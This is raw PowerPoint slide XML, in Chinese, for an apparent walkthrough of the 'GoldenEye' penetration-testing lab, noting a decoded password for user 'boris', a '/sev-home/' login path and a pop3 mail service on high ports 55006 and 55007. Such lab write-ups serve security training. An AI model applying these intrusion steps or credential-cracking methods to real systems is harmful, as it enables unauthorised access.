              <a:gsLst>
                <a:gs pos="0">
                  <a:schemeClr val="accent1">
                    <a:alpha val="0"/>
                  </a:schemeClr>
                </a:gs>
                <a:gs pos="100000">
                  <a:schemeClr val="accent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r="71419"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="193905" y="122669"/>
              <a:ext cx="659535" cy="610870"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="文本占位符 11"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9524" y="1"/>
            <a:ext cx="12172952" cy="856210"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="144000" tIns="144000" rIns="144000" bIns="144000" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
              <a:defRPr sz="3600" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="+mj-ea"/>
                <a:ea typeface="+mj-ea"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>单击此处编辑标题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="灯片编号占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10982973" y="6348122"/>
            <a:ext cx="1037230" cy="342900"/>
          </a:xfrm>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6C93634-D3E4-492F-9DEB-66609690361C}"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11FADFA-9985-49F9-8149-D4EB20F4EB6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16B"/>
            </a:gs>
            <a:gs pos="36000">
              <a:srgbClr val="12347B"/>
            </a:gs>
            <a:gs pos="77000">
              <a:srgbClr val="1B236C"/>
            </a:gs>
            <a:gs pos="100000">
              <a:srgbClr val="141C5D"/>
            </a:gs>
          </a:gsLst>
          <a:lin ang="2700000" scaled="0"/>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93634-D3E4-492F-9DEB-66609690361C}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2023/8/19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FADFA-9985-49F9-8149-D4EB20F4EB6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7.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag15.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide12.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag14.xml"/><Relationship Id="rId9"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2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23.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag23.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag22.xml"/><Relationship Id="rId9"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2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0.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3.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9.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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40.xml"/><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43.xml"/><Relationship Id="rId7"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36.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag45.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image35.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag44.xml"/><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3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35.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag51.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/tags" Target="../tags/tag50.xml"/><Relationship Id="rId9"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56.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.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7.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40.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.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png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image41.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1.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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47.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.png"/><Relationship Id="rId4"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6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65.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image4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 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="副标题 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>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17690" b="30627"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="932815" y="1891665"/>
            <a:ext cx="10667365" cy="1198880"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="4800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="000000">
                      <a:alpha val="43137"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
                <a:ea typeface="方正启体简体" panose="03000509000000000000" pitchFamily="65" charset="-122"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" charset="0"/>
              </a:rPr>
              <a:t>GoldenEye </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="48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cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>靶场综合渗透实验</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="70" name="图形 6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3846" y="411962"/>
            <a:ext cx="2526948" cy="664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en-US" altLang="zh-CN" sz="2800" spc="300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Burpsuite</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>解析密码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{317B1206-C484-451D-AF3A-7CD140B08FF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="639414" y="1279045"/>
            <a:ext cx="10913169" cy="4299909"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A9BBB5E-77E6-4C35-BF9C-C50CFBD626E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2792225" y="5416565"/>
            <a:ext cx="6607548" cy="874470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>获取到了账户</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>boris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>InvincibleHack3r</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9135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B1BD9E9-33E5-464B-A172-BC2E3B61D66F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="109996" y="1376909"/>
            <a:ext cx="11972006" cy="3482174"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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登录</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en-US" altLang="zh-CN" sz="2800" spc="300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-home/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="矩形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A9BBB5E-77E6-4C35-BF9C-C50CFBD626E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="227616" y="2427419"/>
            <a:ext cx="7351236" cy="2237087"/>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“黄金眼”是苏联的绝密武器项目。既然你有权限，你肯定拥有绝密许可并且有资格成为黄金眼网络的认证成员营办商。</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请发送电子邮件给合格的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>GNO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>主管，以接受在线</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>GoldenEye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>操作员培训，成为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>GoldenEye</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>系统的管理员。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C56AACBF-C4CE-4C43-B33A-F39A466E2A43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616001" y="5217536"/>
            <a:ext cx="10548183" cy="57509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请记住，由于隐藏安全性非常有效，因此我们已将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>pop3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>配置为在非常高的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>非默认端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>上运行</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="359032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登录</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en-US" altLang="zh-CN" sz="2800" spc="300" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>sev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" spc="300" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>-home/</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" spc="300" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C56AACBF-C4CE-4C43-B33A-F39A466E2A43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="616001" y="4423854"/>
            <a:ext cx="3772877" cy="168308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发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>55006</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>55007</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>两个未知端口</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查看详细信息，发现其为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>pop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>服务的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>mail server</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华光小标宋_CNKI" panose="02000500000000000000" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B812833B-A652-4382-999F-A38CD43E90B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect t="-1" r="32830" b="1289"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="616001" y="1116656"/>
            <a:ext cx="5274436" cy="3115102"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7800C6A-0633-462B-9B3E-218F5726DEA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId2"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7"/>
          <a:srcRect t="1072" r="10513"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4712260" y="1362236"/>
            <a:ext cx="6989397" cy="4825914"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
